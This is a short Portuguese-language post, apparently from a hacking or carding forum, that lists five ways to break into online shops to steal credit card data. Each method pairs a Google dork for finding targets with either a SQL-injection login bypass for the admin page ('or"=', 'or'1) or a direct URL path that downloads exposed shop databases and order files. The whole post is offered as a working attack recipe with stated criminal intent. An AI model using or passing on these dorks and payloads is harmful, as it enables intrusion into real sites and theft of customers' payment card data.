Exploits

1. Vou deixar aqui alguns exploits que podem ser usados para ter acesso a um site vulnerável e pegar as CC's.
2.  
3.  
4.  
5. Primeira maneira
6.  
7. google dork --> inurl:"/cart.php?m="
8. como a url deve ser --> http://alvo.com/store/cart.php?m=view
9. falha --> troque o cart.php?m=view por /admin
10. pagina de login do adm --> http://abc.com/store/admin
11. username : 'or"="
12. Password : 'or"=
13. se o site estiver vulnerável vocę irá logar como admin na shop.
14.  
15. Segunda maneira
16.  
17. google dork --> inurl:"Lobby.asp"
18. como a url deve ser --> http://www.alvo.com/mall/lobby.asp
19. falha --> mude a parte /mall/lobby.asp para /fpdb/shop.mdb
20. url com a falha --> http://www.alvo.com/fpdb/shop.mdb
21. se o site estiver vulnerável o download do db irá iniciar
22.  
23.  
24. Terceira maneira
25.  
26. google dork :--> inurl:"/shopadmin.asp"
27. como a url deve ser --> http://www.alvo.com/shopadmin.asp
28. user : 'or'1
29. pass : 'or'1
30. terá acesso ao db admin se o site estiver vulnerável
31.  
32. Quarta maneira
33.  
34. google dork --> allinurl:/metacart/
35. url do alvo --> http://www.alvo.com/metacart/about.asp
36. alvo --> /database/metacart.mdb
37. url com a falha --> http://www.abc.com/metacart/database/metacart.mdb
38. download do db se o site estiver vul
39.  
40. Quinta maneira
41.  
42. google dork --> allinurl:/DCShop/
43. url do alvo --> http://www.alvo.com/xxxx/DCShop/xxxx
44. falhas --> /DCShop/orders/orders.txt ou /DCShop/Orders/orders.txt
45. url com a falha --> http://www.alvo.com/xxxx/DCShop/orders/orders.txt ou http://www.alvo.com/xxxx/DCShop/Orders/orders.txt